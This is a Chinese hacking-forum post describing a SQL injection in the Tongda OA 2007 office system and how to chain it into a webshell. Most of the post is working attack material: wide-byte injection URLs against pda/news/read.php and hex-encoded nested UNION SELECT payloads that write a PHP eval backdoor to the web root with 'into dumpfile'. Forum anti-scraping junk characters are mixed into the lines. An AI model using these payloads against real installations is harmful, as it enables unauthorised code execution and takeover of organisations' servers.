找回密码
 立即注册
查看: 3083|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
% ^5 k$ S. Z9 E8 A! x5 g  u8 x# p
8 V6 `  T& [/ _. W: c0 @/ {
8 r: u: S2 D7 t. `7 ROffice Anywhere 2007 网络智能办公系统
/ L0 \  ]: {5 N' Q# t. l# E; m: ]
! |3 m8 w) m7 [7 f2 Yhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..( A5 \/ Y  n& w, g

' m  O5 k) z# D  p
9 v9 i; N0 h* g1 e& p: v+ Y% G这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
6 u; w" E" M5 ]7 C, Y. v
. k, r) u! }5 B例如:SELECT * from USER where USER_ID='{$USERNAME}'  ( L# |2 k' T/ V) X
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
8 G3 [, u5 f  y( W
% G; d+ }$ B6 G# e( ?! \( a* I8 W' s% l这个时候我们是不是可以组合起来使用哪?# m. P' ]# p. L' y

" m& I- u3 ?) y5 w第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
; f* X# n" j4 I+ C7 m' \union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,103 I  Q5 m( L7 v  o
  k7 k+ _* `6 h! C! U
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
7 H" F. R9 W. Z) ^$ B+ P , i8 Z: p$ i) Q; O8 \- L
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。, M  |9 L. F1 k/ v% z: ~
- a; K, G" h: m# L, k* w0 q9 }
那么我们用字符串格式带入进行hex编码
1 z- Z* [# u  ]7 Y
3 m7 ?0 Q! A4 B' q%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23; g, ^# }2 [1 k4 J
) P% F3 F( t# @5 ^
测试ok,获取oa的webshell* Q, R! a+ H/ c9 p9 K7 ]2 i

, |9 m8 ~. }% ~2 w+ @3 c* y
( L9 @4 l  F' d' Apda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%239 [3 V$ n$ N8 P1 t
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表